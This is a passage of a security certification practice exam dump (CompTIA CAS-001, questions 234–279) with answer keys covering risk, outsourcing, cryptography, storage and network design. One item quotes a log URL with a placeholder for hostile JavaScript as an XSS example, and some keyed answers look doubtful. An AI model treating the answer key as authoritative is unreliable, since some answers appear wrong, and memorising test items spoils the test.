A. Grey box testing performed by a major external consulting firm who have signed a NDA.B. Black box testing performed by a major external consulting firm who have signed a NDA.C. White box testing performed by the development and security assurance teams.D. Grey box testing performed by the development and security assurance teams.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 234A large corporation which is heavily reliant on IT platforms and systems is in financial difficulty and needs to drastically reduce costs in the short term to survive. TheChief Financial Officer (CFO) has mandated that all IT and architectural functions will be outsourced and a mixture of providers will be selected. One provider willmanage the desktops for five years, another provider will manage the network for ten years, another provider will be responsible for security for four years, and anoffshore provider will perform day to day business processing functions for two years. At the end of each contract the incumbent may be renewed or a new providermay be selected. Which of the following are the MOST likely risk implications of the CFO's business decision?

A. Strategic architecture will be adversely impacted through the segregation of duties between the providers. Vendor management costs will remain unchanged.The risk position of the organization will decline as specialists now maintain the environment. The implementation of security controls and security updates willimprove. Internal knowledge of IT systems will improve as providers maintain system documentation.

B. Strategic architecture will improve as more time can be dedicated to strategy. System stability will improve as providers use specialists and tested processes tomaintain systems. Vendor management costs will increase and the organization's flexibility to react to new market conditions will be reduced slightly. Internalknowledge of IT systems will improve as providers maintain Real 126CompTIA CAS-001 Examsystem documentation. The risk position of the organization will remain unchanged.

C. Strategic architecture will not be impacted in the short term, but will be adversely impacted in the long term through the segregation of duties between theproviders. Vendor management costs will stay the same and the organization's flexibility to react to new market conditions will be improved through best ofbreed technology implementations. Internal knowledge of IT systems will decline over time. The implementation of security controls and security updates will not

Page 124: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

change.D. Strategic architecture will be adversely impacted through the segregation of duties between the providers. Vendor management costs will increase and the

organization's flexibility to react to new market conditions will be reduced. Internal knowledge of IT systems will decline and decrease future platformdevelopment. The implementation of security controls and security updates will take longer as responsibility crosses multiple boundaries.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 235A small customer focused bank with implemented least privilege principles, is concerned about the possibility of branch staff unintentionally aiding fraud in their dayto day interactions with customers. Bank staff has been encouraged to build friendships with customers to make the banking experience feel more personal. Thesecurity and risk team have decided that a policy needs to be implemented across all branches to address the risk. Which of the following BEST addresses thesecurity and risk team's concerns?

A. Information disclosure policyB. Awareness trainingC. Job rotationD. Separation of duties

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 236A hosting company provides inexpensive guest virtual machines to low-margin customers. Customers manage their own guest virtual machines. Some customerswant basic guarantees of logical separation from other customers and it has been indicated that some customers would like to have configuration control of thisseparation; whereas others want this provided as a value- added service by the hosting company. Which of the following BEST meets these requirements?

A. The hosting company should install a hypervisor-based firewall and allow customers to manage Real 127CompTIA CAS-001 Examthis on an as-needed basis.

B. The hosting company should manage the hypervisor-based firewall; while allowing customers to configure their own host-based firewall.

Page 125: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Customers should purchase physical firewalls to protect their guest hosts and have the hosting company manage these if requested.D. The hosting company should install a host-based firewall on customer guest hosts and offer to administer host firewalls for customers if requested.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 237A financial company implements end-to-end encryption via SSL in the DMZ, and only IPSec in transport mode with AH enabled and ESP disabled throughout theinternal network. The company has hired a security consultant to analyze the network infrastructure and provide a solution for intrusion prevention. Which of thefollowing recommendations should the consultant provide to the security administrator?

A. Switch to TLS in the DMZ. Implement NIPS on the internal network, and HIPS on the DMZ.B. Switch IPSec to tunnel mode. Implement HIPS on the internal network, and NIPS on the DMZ.C. Disable AH. Enable ESP on the internal network, and use NIPS on both networks.D. Enable ESP on the internal network, and place NIPS on both networks.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 238A developer is coding the crypto routine of an application that will be installed on a standard headless and diskless server connected to a NAS housed in thedatacenter. The developer has written the following six lines of code to add entropy to the routine:

1 - If VIDEO input exists, use video data for entropy

2 - If AUDIO input exists, use audio data for entropy

3 - If MOUSE input exists, use mouse data for entropy

4 - IF KEYBOARD input exists, use keyboard data for entropy

5 - IF IDE input exists, use IDE data for entropy

Page 126: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 128CompTIA CAS-001 Exam6 - IF NETWORK input exists, use network data for entropy

Which of the following lines of code will result in the STRONGEST seed when combined?

A. 2 and 1B. 3 and 5C. 5 and 2D. 6 and 4

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 239After three vendors submit their requested documentation, the CPO and the SPM can better understand what each vendor does and what solutions that they canprovide. But now they want to see the intricacies of how these solutions can adequately match the requirements needed by the firm. Upon the directive of the CPO,the CISO should submit which of the following to the three submitting firms?

A. A T&M contractB. An RFPC. A FFP agreementD. A new RFQ

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 240The <nameID> element in SAML can be provided in which of the following predefined formats? (Select TWO).

Page 127: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. X.509 subject nameB. PTR DNS recordC. EV certificate OID extensionD. Kerberos principal nameE. WWN record name

Correct Answer: ADSection: (none)Explanation

Explanation/Reference:answer is up-to-date.

QUESTION 241A corporation has expanded for the first time by integrating several newly acquired businesses.

Which of the following are the FIRST tasks that the security team should undertake? (Select TWO).

A. Remove acquired companies Internet access.B. Federate identity management systems.C. Install firewalls between the businesses.D. Re-image all end user computers to a standard image.E. Develop interconnection policy.F. Conduct a risk analysis of each acquired company's networks.

Correct Answer: EFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 242New zero-day attacks are announced on a regular basis against a broad range of technology systems. Which of the following best practices should a securitymanager do to manage the risks of these attack vectors? (Select TWO).

A. Establish an emergency response call tree.B. Create an inventory of applications.

Page 128: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Backup the router and firewall configurations.D. Maintain a list of critical systems.E. Update all network diagrams.

Correct Answer: BDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 243A WAF without customization will protect the infrastructure from which of the following attack combinations?

Real 130CompTIA CAS-001 Exam

A. DDoS, DNS poisoning, Boink, TeardropB. Reflective XSS, HTTP exhaustion, TeardropC. SQL Injection, DOM based XSS, HTTP exhaustionD. SQL Injection, CSRF, Clickjacking

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 244Company ABC is planning to outsource its Customer Relationship Management system (CRM) and marketing / leads management to Company XYZ.

Which of the following is the MOST important to be considered before going ahead with the service?

A. Internal auditors have approved the outsourcing arrangement.B. Penetration testing can be performed on the externally facing web system.C. Ensure there are security controls within the contract and the right to audit.D. A physical site audit is performed on Company XYZ's management / operation.

Page 129: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 245The Linux server at Company A hosts a graphical application widely used by the company designers. One designer regularly connects to the server from a Maclaptop in the designer's office down the hall. When the security engineer learns of this it is discovered the connection is not secured and the password can easily beobtained via network sniffing. Which of the following would the security engineer MOST likely implement to secure this connection?

Linux Server: 192.168.10.10/24

Mac Laptop: 192.168.10.200/24

A. From the server, establish an SSH tunnel to the Mac and VPN to 192.168.10.200.B. From the Mac, establish a remote desktop connection to 192.168.10.10 using Network Layer Authentication and the CredSSP security provider.C. From the Mac, establish a VPN to the Linux server and connect the VNC to 127.0.0.1.D. From the Mac, establish a SSH tunnel to the Linux server and connect the VNC to 127.0.0.1.

Real 131CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 246A data breach has occurred at Company A and as a result, the Chief Information Officer (CIO) has resigned. The CIO's laptop, cell phone and PC were all wiped ofdata per company policy. A month later, prosecutors in litigation with Company A suspect the CIO knew about the data breach long before it was discovered andhave issued a subpoena requesting all the CIO's email from the last 12 months. The corporate retention policy recommends keeping data for no longer than 90days. Which of the following should occur?

A. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the subpoena request.B. Inform the litigators that the CIOs information has been deleted as per corporate policy.C. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the CIO resignation.D. Restore the CIO's email from an email server backup and provide whatever is available up to the last 12 months from the subpoena date.

Page 130: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 247A security administrator at a Lab Company is required to implement a solution which will provide the highest level of confidentiality possible to all data on the labnetwork.

The current infrastructure design includes:

- Two-factor token and biometric based authentication for all users- Attributable administrator accounts- Logging of all transactions- Full disk encryption of all HDDs- Finely granular access controls to all resources- Full virtualization of all servers- The use of LUN masking to segregate SAN data- Port security on all switches

The network is protected with a firewall implementing ACLs, a NIPS device, and secured wireless access points.

Real 132CompTIA CAS-001 ExamWhich of the following cryptographic improvements should be made to the current architecture to achieve the stated goals?

A. PKI based authorizationB. Transport encryptionC. Data at rest encryptionD. Code signing

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Page 131: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 248A data processing server uses a Linux based file system to remotely mount physical disks on a shared SAN. The server administrator reports problems related toprocessing of files where the file appears to be incompletely written to the disk. The network administration team has conducted a thorough review of all networkinfrastructure and devices and found everything running at optimal performance. Other SAN customers are unaffected. The data being processed consists ofmillions of small files being written to disk from a network source one file at a time. These files are then accessed by a local Java program for processing beforebeing transferred over the network to a SE Linux host for processing. Which of the following is the MOST likely cause of the processing problem?

A. The administrator has a PERL script running which disrupts the NIC by restarting the CRON process every 65 seconds.B. The Java developers accounted for network latency only for the read portion of the processing and not the write process.C. The virtual file system on the SAN is experiencing a race condition between the reads and writes of network files.D. The Linux file system in use cannot write files as fast as they can be read by the Java program resulting in the errors.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 249Company ABC was formed by combining numerous companies which all had multiple databases, web portals, and cloud data sets. Each data store had a uniqueset of custom developed authentication mechanisms and schemas. Which of the following approaches to combining the disparate mechanisms has the LOWESTup front development costs?

Real 133CompTIA CAS-001 Exam

A. AttestationB. PKIC. BiometricsD. Federated IDs

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 250

Page 132: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A security researcher is about to evaluate a new secure VoIP routing appliance. The appliance manufacturer claims the new device is hardened against all knownattacks and several un- disclosed zero day exploits. The code base used for the device is a combination of compiled C and TC/TKL scripts. Which of the followingmethods should the security research use to enumerate the ports and protocols in use by the appliance?

A. Device fingerprintingB. Switchport analyzerC. Grey box testingD. Penetration testing

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 251Customer Need:

"We need the system to produce a series of numbers with no discernible mathematical progression for use by our Java based, PKI-enabled, customer facingwebsite."

Which of the following BEST restates the customer need?

A. The system shall use a pseudo-random number generator seeded the same every time.B. The system shall generate a pseudo-random number upon invocation by the existing Java program.C. The system shall generate a truly random number based upon user PKI certificates.D. The system shall implement a pseudo-random number generator for use by corporate customers.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Real 134CompTIA CAS-001 Exam

Explanation:

QUESTION 252

Page 133: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A security engineer is implementing a new solution designed to process e-business transactions and record them in a corporate audit database. The project hasmultiple technical stakeholders. The database team controls the physical database resources, the internal audit division controls the audit records in the database,the web hosting team is responsible for implementing the website front end and shopping cart application, and the accounting department is responsible forprocessing the transaction and interfacing with the payment processor. As the solution owner, the security engineer is responsible for ensuring which of thefollowing?

A. Ensure the process functions in a secure manner from customer input to audit review.B. Security solutions result in zero additional processing latency.C. Ensure the process of storing audit records is in compliance with applicable laws.D. Web transactions are conducted in a secure network channel.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 253A large financial company has a team of security-focused architects and designers that contribute into broader IT architecture and design solutions. Concerns havebeen raised due to the security contributions having varying levels of quality and consistency. It has been agreed that a more formalized methodology is needed thatcan take business drivers, capabilities, baselines, and re- usable patterns into account. Which of the following would BEST help to achieve these objectives?

A. Construct a library of re-usable security patternsB. Construct a security control libraryC. Introduce an ESA frameworkD. Include SRTM in the SDLC

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 254Real 135CompTIA CAS-001 ExamA University uses a card transaction system that allows students to purchase goods using their student ID. Students can put money on their ID at terminalsthroughout the campus. The security administrator was notified that computer science students have been using the network to illegally put money on their cards.

Page 134: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

The administrator would like to attempt to reproduce what the students are doing. Which of the following is the BEST course of action?

A. Notify the transaction system vendor of the security vulnerability that was discovered.B. Use a protocol analyzer to reverse engineer the transaction system's protocol.C. Contact the computer science students and threaten disciplinary action if they continue their actions.D. Install a NIDS in front of all the transaction system terminals.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 255At 10:35 a.m. a malicious user was able to obtain a valid authentication token which allowed read/write access to the backend database of a financial company. At10:45 a.m. the security administrator received multiple alerts from the company's statistical anomaly-based IDS about a company database administratorperforming unusual transactions. At 10:55 a.m. the security administrator resets the database administrator's password.

At 11:00 a.m. the security administrator is still receiving alerts from the IDS about unusual transactions from the same user. Which of the following is MOST likelythe cause of the alerts?

A. The IDS logs are compromised.B. The new password was compromised.C. An input validation error has occurred.D. A race condition has occurred.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 256Company A is purchasing Company B. Company A uses a change management system for all IT processes while Company B does not have one in place.Company B's IT staff needs to purchase a third party product to enhance production. Which of the following NEXT steps should be implemented to address thesecurity impacts this product may cause?

Real 136

Page 135: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

CompTIA CAS-001 Exam

A. Purchase the product and test it in a lab environment before installing it on any live system.B. Allow Company A and B's IT staff to evaluate the new product prior to purchasing it.C. Purchase the product and test it on a few systems before installing it throughout the entire company.D. Use Company A's change management process during the evaluation of the new product.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 257The marketing department at Company A regularly sends out emails signed by the company's Chief Executive Officer (CEO) with announcements about thecompany. The CEO sends company and personal emails from a different email account. During legal proceedings against the company, the Chief InformationOfficer (CIO) must prove which emails came from the CEO and which came from the marketing department. The email server allows emails to be digitally signedand the corporate PKI provisioning allows for one certificate per user. The CEO did not share their password with anyone. Which of the following will allow the CIOto state which emails the CEO sent and which the marketing department sent?

A. Identity proofingB. Non-repudiationC. Key escrowD. Digital rights management

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 258A security administrator must implement a SCADA style network overlay to ensure secure remote management of all network management and infrastructuredevices. Which of the following BEST describes the rationale behind this architecture?

A. A physically isolated network that allows for secure metric collection.B. A physically isolated network with inband management that uses two factor authentication.

Page 136: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. A logically isolated network with inband management that uses secure two factor authentication.D. An isolated network that provides secure out-of-band remote management.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Real 137CompTIA CAS-001 Exam

Explanation:

QUESTION 259A helpdesk manager at a financial company has received multiple reports from employees and customers that their phone calls sound metallic on the voice system.The helpdesk has been using VoIP lines encrypted from the handset to the PBX for several years. Which of the following should be done to address this issue forthe future?

A. SIP session tagging and QoSB. A dedicated VLANC. Lower encryption settingD. Traffic shaping

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 260Which of the following provides the HIGHEST level of security for an integrated network providing services to authenticated corporate users?

A. Point to point VPN tunnels for external users, three-factor authentication, a cold site, physical security guards, cloud based servers, and IPv6 networking.B. IPv6 networking, port security, full disk encryption, three-factor authentication, cloud based servers, and a cold site.C. Port security on switches, point to point VPN tunnels for user server connections, two-factor cryptographic authentication, physical locks, and a standby hot site.D. Port security on all switches, point to point VPN tunnels for user connections to servers, two- factor authentication, a sign-in roster, and a warm site.

Correct Answer: C

Page 137: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 261A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysisregarding a new system which the

Real 138CompTIA CAS-001 Examdevelopers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor whoperformed a security assessment of the system. The report details what seem to be a manageable volume of infrequently exploited security vulnerabilities. Thedirector decides to implement continuous monitoring and other security controls to mitigate the impact of the vulnerabilities. Which of the following should thedirector require from the developers before agreeing to deploy the system?

A. An incident response plan which guarantees response by tier two support within 15 minutes of an incident.B. A definitive plan of action and milestones which lays out resolutions to all vulnerabilities within six months.C. Business insurance to transfer all risk from the company shareholders to the insurance company.D. A prudent plan of action which details how to decommission the system within 90 days of becoming operational.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 262Company XYZ has transferred all of the corporate servers, including web servers, to a cloud hosting provider to reduce costs. All of the servers are runningunpatched, outdated versions of Apache. Furthermore, the corporate financial data is also hosted by the cloud services provider, but it is encrypted when not in use.Only the DNS server is configured to audit user and administrator actions and logging is disabled on the other virtual machines. Given this scenario, which of thefollowing is the MOST significant risk to the system?

A. All servers are unpatched and running old versions.B. Financial data is processed without being encrypted.C. Logging is disabled on critical servers.D. Server services have been virtualized and outsourced.

Page 138: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 263A Chief Information Security Officer (CISO) of a major consulting firm has significantly increased the company's security posture; however, the company is stillplagued by data breaches of misplaced assets. These data breaches as a result have led to the compromise of sensitive

Real 139CompTIA CAS-001 Examcorporate and client data on at least 25 occasions. Each employee in the company is provided a laptop to perform company business. Which of the followingactions can the CISO take to mitigate the breaches?

A. Reload all user laptops with full disk encryption software immediately.B. Implement full disk encryption on all storage devices the firm owns.C. Implement new continuous monitoring procedures.D. Implement an open source system which allows data to be encrypted while processed.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 264The security administrator is responsible for the confidentiality of all corporate data. The company's servers are located in a datacenter run by a different vendor.The vendor datacenter hosts servers for many different clients, all of whom have access to the datacenter. None of the racks are physically secured. Recently, thecompany has been the victim of several attacks involving data injection and exfiltatration. The security administrator suspects these attacks are due to several newnetwork based attacks facilitated by having physical access to a system. Which of the following BEST describes how to adapt to the threat?

A. Apply port security to all switches, switch to SCP, and implement IPSec tunnels between devices.B. Apply two factor authentication, require point to point VPNs, and enable log auditing on all devices.C. Apply port security to all routers, switch to telnet, and implement point to point VPNs on all servers.D. Apply three factor authentication, implement IPSec, and enable SNMP.

Correct Answer: A

Page 139: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 265Which of the following should be used to identify overflow vulnerabilities?

A. FuzzingB. Input validationC. Privilege escalation

Real 140CompTIA CAS-001 Exam

D. Secure coding standards

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 266When attending the latest security conference, an information security administrator noticed only a few people carrying a laptop around. Most other attendees onlycarried their smartphones.

Which of the following would impact the security of conference's resources?

A. Wireless network security may need to be increased to decrease access of mobile devices.B. Physical security may need to be increased to deter or prevent theft of mobile devices.C. Network security may need to be increased by reducing the number of available physical network jacks.D. Wireless network security may need to be decreased to allow for increased access of mobile devices.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Page 140: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 267A network administrator notices a security intrusion on the web server. Which of the following is noticed by http://test.com/modules.php?op=modload&name=XForum&file=[hostilejavascript]&fid=2 in the log file?

A. Buffer overflowB. Click jackingC. SQL injectionD. XSS attack

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 268Real 141CompTIA CAS-001 ExamThe Chief Technology Officer (CTO) has decided that servers in the company datacenter should be virtualized to conserve physical space. The risk assuranceofficer is concerned that the project team in charge of virtualizing servers plans to co-mingle many guest operating systems with different security requirements tospeed up the rollout and reduce the number of host operating systems or hypervisors required.

Which of the following BEST describes the risk assurance officer's concerns?

A. Co-mingling guest operating system with different security requirements allows guest OS privilege elevation to occur within the guest OS via shared memoryallocation with the host OS.

B. Co-mingling of guest operating systems with different security requirements increases the risk of data loss if the hypervisor fails.C. A weakly protected guest OS combined with a host OS exploit increases the chance of a successful VMEscape attack being executed, compromising the

hypervisor and other guest OS.D. A weakly protected host OS will allow the hypervisor to become corrupted resulting in data throughput performance issues.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Page 141: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 269Due to cost and implementation time pressures, a security architect has allowed a NAS to be used instead of a SAN for a non-critical, low volume database. Whichof the following would make a NAS unsuitable for a business critical, high volume database application that required a high degree of data confidentiality and dataavailability? (Select THREE).

A. File level transfer of dataB. Zoning and LUN securityC. Block level transfer of dataD. MultipathE. Broadcast stormsF. File level encryptionG. Latency

Correct Answer: AEGSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 270Real 142CompTIA CAS-001 ExamAn IT administrator wants to restrict DNS zone transfers between two geographically dispersed, external company DNS name servers, and has decided to useTSIG. Which of the following are critical when using TSIG? (Select TWO).

A. Periodic key changes once the initial keys are established between the DNS name servers.B. Secure exchange of the key values between the two DNS name servers.C. A secure NTP source used by both DNS name servers to avoid message rejection.D. DNS configuration files on both DNS name servers must be identically encrypted.E. AES encryption with a SHA1 hash must be used to encrypt the configuration files on both DNS name servers.

Correct Answer: BCSection: (none)Explanation

Explanation/Reference:Explanation:

Page 142: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 271As part of the ongoing information security plan in a large software development company, the Chief Information officer (CIO) has decided to review and update thecompany's privacy policies and procedures to reflect the changing business environment and business requirements.

Training and awareness of the new policies and procedures has been incorporated into the security awareness program which should be:

A. presented by top level management to only data handling staff.B. customized for the various departments and staff roles.C. technical in nature to ensure all development staff understand the procedures.D. used to promote the importance of the security department.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 272Which of the following is the BEST place to contractually document security priorities, responsibilities, guarantees, and warranties when dealing with outsourcingproviders?

A. NDAB. OLAC. MOUD. SLA

Real 143CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 273Staff from the sales department have administrator rights to their corporate standard operating environment, and often connect their work laptop to customernetworks when onsite during meetings and presentations. This increases the risk and likelihood of a security incident when the sales staff reconnects to thecorporate LAN. Which of the following controls would BEST protect the corporate network?

Page 143: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Implement a network access control (NAC) solution that assesses the posture of the laptop before granting network access.B. Use an independent consulting firm to provide regular network vulnerability assessments and biannually qualitative risk assessments.C. Provide sales staff with a separate laptop with no administrator access just for sales visits.D. Update the acceptable use policy and ensure sales staff read and acknowledge the policy.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 274The risk committee has endorsed the adoption of a security system development life cycle (SSDLC) designed to ensure compliance with PCI-DSS, HIPAA, andmeet the organization's mission. Which of the following BEST describes the correct order of implementing a five phase SSDLC?

A. Initiation, assessment/acquisition, development/implementation, operations/maintenance and sunset.B. Initiation, acquisition/development, implementation/assessment, operations/maintenance and sunset.C. Assessment, initiation/development, implementation/assessment, operations/maintenance and disposal.D. Acquisition, initiation/development, implementation/assessment, operations/maintenance and disposal.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 144CompTIA CAS-001 Exam

QUESTION 275An organization determined that each of its remote sales representatives must use a smartphone for email access.

The organization provides the same centrally manageable model to each person.

Which of the following mechanisms BEST protects the confidentiality of the resident data?

Page 144: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Require dual factor authentication when connecting to the organization's email server.B. Require each sales representative to establish a PIN to access the smartphone and limit email storage to two weeks.C. Require encrypted communications when connecting to the organization's email server.D. Require a PIN and automatic wiping of the smartphone if someone enters a specific number of incorrect PINs.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 276An organization did not know its internal customer and financial databases were compromised until the attacker published sensitive portions of the database onseveral popular attacker websites. The organization was unable to determine when, how, or who conducted the attacks but rebuilt, restored, and updated thecompromised database server to continue operations.

Which of the following is MOST likely the cause for the organization's inability to determine what really occurred?

A. Too few layers of protection between the Internet and internal networkB. Lack of a defined security auditing methodologyC. Poor intrusion prevention system placement and maintenanceD. Insufficient logging and mechanisms for review

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 145CompTIA CAS-001 Exam

QUESTION 277An administrator has a system hardening policy to only allow network access to certain services, to always use similar hardware, and to protect from unauthorizedapplication configuration changes.

Which of the following technologies would help meet this policy requirement? (Select TWO).

Page 145: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Spam filterB. Solid state drivesC. Management interfaceD. VirtualizationE. Host firewall

Correct Answer: DESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 278About twice a year a switch fails in a company's network center. Under the maintenance contract, the switch would be replaced in two hours losing the business$1,000 per hour. The cost of a spare switch is $3,000 with a 12-hour delivery time and would eliminate downtime costs if purchased ahead of time. Themaintenance contract is $1,500 per year.

Which of the following is true in this scenario?

A. It is more cost-effective to eliminate the maintenance contract and purchase a replacement upon failure.B. It is more cost-effective to purchase a spare switch prior to an outage and eliminate the maintenance contract.C. It is more cost-effective to keep the maintenance contract instead of purchasing a spare switch prior to an outage.D. It is more cost-effective to purchase a spare switch prior to an outage and keep the maintenance contract.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 279Real 146CompTIA CAS-001 ExamAn administrator receives reports that the network is running slow for users connected to a certain switch. Viewing the network traffic, the administrator reviews thefollowing:

18:51:59.042108 IP linuxwksta.55467 > dns.company.com.domain: 39462+ PTR? 222.17.4.10.in- addr.arpa. (42)

Page 146: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

18:51:59.055732 IP dns.company.com.domain > linuxwksta.55467: 39462 NXDomain 0/0/0 (42)

18:51:59.055842 IP linuxwksta.48287 > dns.company.com.domain: 46767+ PTR? 255.19.4.10.in- addr.arpa. (42)

18:51:59.069816 IP dns.company.com.domain > linuxwksta.48287: 46767 NXDomain 0/0/0 (42)

18:51:59.159060 IP linuxwksta.42491 > 10.4.17.72.iscsi-target: Flags [P.], seq 1989625106:1989625154, ack 2067334822, win 1525, options [nop,nop,TS val16021424 ecr 215646227], length 48

18:51:59.159145 IP linuxwksta.48854 > dns.company.com.domain: 3834+ PTR? 72.17.4.10.in- addr.arpa. (41)

18:51:59.159314 IP 10.4.17.72.iscsi-target > linuxwksta.42491: Flags [P.], seq 1:49, ack 48, win 124, options [nop,nop,TS val 215647479 ecr 16021424], length 48

